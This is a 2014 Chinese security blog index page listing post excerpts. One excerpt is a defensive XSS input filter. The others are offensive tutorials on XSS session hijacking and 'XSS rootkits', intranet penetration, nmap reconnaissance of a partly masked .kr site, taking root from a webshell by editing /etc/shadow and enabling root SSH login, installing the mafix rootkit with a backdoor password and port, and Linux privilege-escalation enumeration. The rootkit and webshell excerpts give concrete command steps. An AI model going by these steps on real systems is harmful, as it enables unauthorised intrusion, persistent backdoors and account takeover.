上一页 1 ··· 65 66 67 68 69 70 71 72 73 ··· 82 下一页
  2014年3月27日
摘要: /**+----------------------------------------------------------* The goal of this function is to be a generic function that can be used to parse almost any input and * render it XSS safe. For more information on actual XSS attacks, check out http://ha.ckers.org/xss.html. * Another excellent site is t 阅读全文
posted @ 2014-03-27 14:40 milantgh 阅读(1220) 评论(0) 推荐(0) 编辑
摘要: 黑客用XSS攻击有多种方式,PHP的内置函数不能应对各种各样的XSS攻击。因此,使用filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags等功能也不能做到100%的防护。你需要一个更好的机制,这是你的解决方案:]+?[\x00-\x20"\'])(?:on|xmlns)[^>]*+>#iu', '$1>', $data);// Remove javascript: and vbscript: protocols$data = preg_r 阅读全文
posted @ 2014-03-27 14:38 milantgh 阅读(1180) 评论(0) 推荐(0) 编辑
摘要: 以往对XSS的利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。一 XSS下提升权限 随着AJAX技术在许多大型SNS网站的应用,XSS也变得愈加流行,在XSS场景下运用AJAX能更有效地发挥它的作用。用户输入的地方最容易滋生XSS,譬如留言、评论等表单,我搭建了一个sdbook的留言本,因为sdbook没有对用户输入的变量作出合适的过滤,导致一个XSS的产生。 留言率先传递给管理员,当作javascript劫持,我们就可以利用管理员的权限做任何事情,例如添加一个管理 阅读全文
posted @ 2014-03-27 14:29 milantgh 阅读(2901) 评论(0) 推荐(0) 编辑
摘要: 顶80SEC的牛。深掘XSS漏洞场景之XSS Rootkit[完整修订版]EMail: rayh4c#80sec.comSite: http://www.80sec.comDate: 2011-10-150×00 前言众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久型和非持久型两种:1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。3. DOM XSS漏洞 阅读全文
posted @ 2014-03-27 14:20 milantgh 阅读(782) 评论(0) 推荐(0) 编辑
摘要: 前些天和Roy厉在微博上聊到微信公众账号,我说我在辛苦运营“网站安全中心”这个账号呢,他说我这账号粉丝少是少了点,不过用户定位精确,我说我不希望精确,因为我在尽可能写科普,科普需要传播。Roy厉说过两天他会在他的“戏里戏外”这个微信公众账号里帮我推推,这不,昨天推了下,就涨了很多粉。这里特别感谢他下,也推荐大家收听这位有情怀的黑客的“戏里戏外”。今天的话题也是顺着他的推荐而起的,他说到我玩XSS数一数二,奠定了之后的一些玩法。对他的说法,不敢当。书其实我是后起之秀,07年底才开始从PC安全专过来研究前端安全,不知道为什么我感觉前端安全会是一次浪潮。XSS的很多玩法,我都写进我们的书里《Web前 阅读全文
posted @ 2014-03-27 14:14 milantgh 阅读(310) 评论(0) 推荐(0) 编辑
  2014年3月26日
摘要: 内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误 区。但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破,到控制整个内网的全过程来跟大家讨论,内 网的渗透嗅探术和安全防护一些内容。在寻找突破时,更多的是从应用服务来,而应用服务最直观的信息采集,就是端口扫描,不同的应用,开放的服务不一样。所以,在对网络进行信息收集时, 大概分为这样两步: 端口探测,程序指纹分析。在端口探测方面,个人喜欢用SuperScan来快速对网段里的应用进行判断,如图:在掌握端口信息后 阅读全文
posted @ 2014-03-26 17:37 milantgh 阅读(1512) 评论(0) 推荐(0) 编辑
摘要: 首先用nmap检测一下目标网站的系统服务和一些端口banner的信息。Nmap -v -sT -sV -O -P0 -oX test.xml ***.kr21/tcp open ftp ProFTPD22/tcp open ssh OpenSSH 4.3 (protocol 2.0)25/tcp open smtp Sendmail 8.13.8/8.13.853/tcp open domain ISC BIND 9.3.4-P180/tcp open http Apache httpd135/tcp filtere... 阅读全文
posted @ 2014-03-26 12:51 milantgh 阅读(2442) 评论(0) 推荐(0) 编辑
摘要: 没啥技术含量,一种思路,让某些得到root权限webshell的童鞋可以快点拿到权限。某日拿到某站webshell,RedHat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。1.webshell直接替换root密码: /etc/shadow // 记得备份2.允许root通过ssh登陆: /etc/ssh/sshd_configPermitRootLogin yes #允许root登陆3.重启ssh服务 service ssh restart4.以root身份登陆ssh,增加一个用户useradd applicationpasswd // 根据提示设置密 阅读全文
posted @ 2014-03-26 12:45 milantgh 阅读(639) 评论(0) 推荐(0) 编辑
  2014年3月25日
摘要: 1.首先是获得远程服务器的root权限2.然后下载rootkit程序,本文用到的是mafix(下载前最好把杀毒软件关掉,基本上会报毒的!)3.开始安装tar -xvzf mafix.tar.gzcd mafix./root rootkit345 (其中rootkit为你连接后门程序时的密码,345为连接的端口)可以验证一下是否成功:[root@localhost ~]# netstat -anlp|grep 345tcp 0 0 0.0.0.0:345 0.0.0.0:* LISTEN 11280/ttyload可以看到,345端口已经在监听了。4.连接后门程序ssh 192.168.211. 阅读全文
posted @ 2014-03-25 22:26 milantgh 阅读(1272) 评论(0) 推荐(0) 编辑
摘要: 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关键点(Linux)的提权是怎么一回事:收集–枚举,枚举和一些更多的枚举。过程–通过数据排序,分析和确定优先次序。搜索–知道搜索什么和在哪里可以找到漏洞代码。适应–自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。尝试–做好准备,试验和错误。操作类型操作类型是什么版本?cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release它的内核版本是什么?cat/proc/version 阅读全文
posted @ 2014-03-25 22:16 milantgh 阅读(514) 评论(0) 推荐(0) 编辑
上一页 1 ··· 65 66 67 68 69 70 71 72 73 ··· 82 下一页